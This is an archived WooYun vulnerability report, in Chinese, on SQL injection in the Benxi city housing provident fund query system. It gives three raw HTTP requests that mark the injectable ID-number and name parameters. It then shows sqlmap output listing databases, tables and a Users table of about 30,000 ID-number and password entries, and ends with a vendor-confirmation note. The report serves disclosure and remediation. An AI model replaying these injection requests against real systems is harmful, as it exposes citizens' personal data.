乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-30: 细节已通知厂商并且等待厂商处理中 2015-11-03: 厂商已经确认,细节仅向厂商公开 2015-11-13: 细节向核心白帽子及相关领域专家公开 2015-11-23: 细节向普通白帽子公开 2015-12-03: 细节向实习白帽子公开 2015-12-18: 细节向公众公开
rt
辽宁省本溪市住房公积金查询系统SQL注入打包,接近三万条用户信息泄露第一处:
POST /index.aspx HTTP/1.1Content-Length: 546Content-Type: application/x-www-form-urlencodedHost: **.**.**.**Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*queryBtn=%e6%9f%a5%c2%a0%e8%af%a2&sfzh=*&zgxm=1&__EVENTVALIDATION=/wEdAAWFGPDFx%2biwix4ucGbJMWHBIzXvzffmx436DR9Xc/o2DCAwoBLQ1momdihx35Zu8uukYCTy/gpHrfKE6XIneSqJzfg78Z8BXhXifTCAVkevd1oD6Cgt5Loi59xANbE/5SdjIinmBJ6/Gb/2asYNCzXP&__VIEWSTATE=/wEPDwUJNTEyNTM3NTEyD2QWAgIBD2QWAgILDzwrABECARAWABYAFgAMFCsAAGQYAQUJR3JpZFZpZXcxD2dkV%2bGYGvRyPGH9AmcIqIy4VSMnZp9rZf9y2%2b7O6PVrz5Q%3d参数sfzh 和 zgxm参数存在sql注入
第二处:
POST / HTTP/1.1Content-Length: 546Content-Type: application/x-www-form-urlencodedHost: **.**.**.**Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*queryBtn=%e6%9f%a5%c2%a0%e8%af%a2&sfzh=*&zgxm=1&__EVENTVALIDATION=/wEdAAWFGPDFx%2biwix4ucGbJMWHBIzXvzffmx436DR9Xc/o2DCAwoBLQ1momdihx35Zu8uukYCTy/gpHrfKE6XIneSqJzfg78Z8BXhXifTCAVkevd1oD6Cgt5Loi59xANbE/5SdjIinmBJ6/Gb/2asYNCzXP&__VIEWSTATE=/wEPDwUJNTEyNTM3NTEyD2QWAgIBD2QWAgILDzwrABECARAWABYAFgAMFCsAAGQYAQUJR3JpZFZpZXcxD2dkV%2bGYGvRyPGH9AmcIqIy4VSMnZp9rZf9y2%2b7O6PVrz5Q%3d参数sfzh 和 zgxm参数存在sql注入
第三处:
POST /register.aspx HTTP/1.1Content-Length: 627Content-Type: application/x-www-form-urlencodedHost: **.**.**.**Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*registerBtn=%e6%b3%a8%c2%a0%c2%a0%c2%a0%c2%a0%e5%86%8c&pass=g00dPa%24%24w0rD&sfzh=*&zgxm=1&__EVENTVALIDATION=/wEdAAZRmGJVbl4%2bqQgcx%2bUO1OvOIzXvzffmx436DR9Xc/o2DN4Xcj%2byyOoBNCPOW5xUI%2bKkYCTy/gpHrfKE6XIneSqJRvgmDPsecjMqPv%2bQuIhFOz9YyyR4qjX0bKJ2X6bXV1M3D7YNVcJt1JmWHwjU3esh2SFgaZ0znnKZixmtnJT4fA%3d%3d&__VIEWSTATE=/wEPDwULLTEzNzQxMTAyNjcPZBYCAgEPZBYCAg0PPCsAEQIBEBYAFgAWAAwUKwAAZBgBBQlHcmlkVmlldzEPZ2T9QyhU4uvJFNN7Anm79hUb/wmiWUJCFsQI8LXnG1EzXQ%3d%3dsfzh参数存在sql注入
web server operating system: Windows 8.1 or 2012 R2web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 8.5back-end DBMS: Microsoft SQL Server 2012current user: 'sa'current database: 'zfgjj'current user is DBA: Trueavailable databases [11]:[*] bxip[*] bxrc[*] Changan_db[*] master[*] model[*] msdb[*] NDRC_DB[*] ReportServer[*] ReportServerTempDB[*] tempdb[*] zfgjjDatabase: zfgjj[12 tables]+--------------+| GJJ20150131 || GJJ20150228 || GJJ20150301 || GJJ20150331 || GJJ20150430 || GJJ20150531 || GJJ20150630 || GJJ20150731 || GJJ20150831 || Users || sqlmapoutput || test_1 |+--------------+Database: zfgjjTable: Users[2 columns]+----------+---------+| Column | Type |+----------+---------+| password | varchar || sfzh | varchar |+----------+---------+Database: zfgjjTable: Users[29988 entries]
参数过滤,参数化查询求20rank
危害等级:高
漏洞Rank:10
确认时间:2015-11-03 14:51
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发对应分中心,由其后续协调网站管理单位处置。
暂无